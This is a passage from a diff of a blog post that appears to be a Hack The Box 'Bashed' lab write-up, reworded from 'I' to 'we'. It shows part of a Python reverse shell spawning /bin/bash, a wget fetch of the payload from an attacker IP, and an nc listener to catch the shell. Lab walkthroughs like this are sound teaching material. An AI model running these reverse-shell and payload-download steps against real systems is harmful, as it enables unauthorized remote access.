rax-register/rax-register.github.io/_posts/2020-07-09-htb-bashed.md

     os.dup2(s.fileno(),2)
     p=subprocess.call(["/bin/bash","-i"])

-Then I ran python's HTTP server:
+On Kali, we need to run python's HTTP server to serve the current directory via HTTP:

     python -m SimpleHTTPServer 8080

-Over on bashed I ran a wget command to download the test.py file to bashed:
+Over on bashed we execute a wget command to download the test.py file:

     wget http://10.10.14.24:8080/test.py

 ![](/images/bashed/21. wget.png "wget")

-Next I set up a nc listener on Kali to catch the connection:
+Next we set up a nc listener on Kali to catch the connection:

     nc -lvnp 17012